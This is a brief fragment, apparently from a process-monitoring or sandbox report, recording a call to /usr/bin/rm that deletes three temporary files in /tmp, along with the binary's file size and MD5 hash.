                                          Path:/usr/bin/rm
                                          Arguments:rm -f /tmp/tmp.czFjcWPh1i /tmp/tmp.ElHTL6aAuP /tmp/tmp.rpE6mXwnI3
                                          File size:72056 bytes
                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b